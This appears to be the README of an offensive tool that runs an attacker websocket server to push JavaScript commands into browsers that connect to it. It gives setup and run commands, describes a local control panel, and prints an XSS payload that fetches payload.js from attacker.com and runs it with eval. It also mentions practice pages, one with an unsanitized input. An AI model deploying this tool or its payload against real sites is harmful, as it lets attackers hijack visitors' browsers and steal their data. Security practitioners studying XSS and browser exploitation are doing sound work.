Issue JS commands remotely when clients connect to your attacker websocket server
Inspired by https://www.nullpt.rs/hacking-gta-servers-using-web-exploitation
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txtRun the server
python3 JSCommnder-server.pyControl panel is only accessible from localhost on the machine you run me on. Available at http://localhost:8080/control_panel.html
You can use XSS payloads to connect to the websocket server. i.e:
<img src="#" onerror='fetch(`http://attacker.com:8081/payload.js`).then(res=>res.text().then(r=>eval(r)))' style="display:none" />There are 2 testing HTML files to play with.
test_client.htmlsimply connects to the webocket server upon opening it in your browser.test_client2.htmlhas an unsanitized input for practicing with XSS payloads.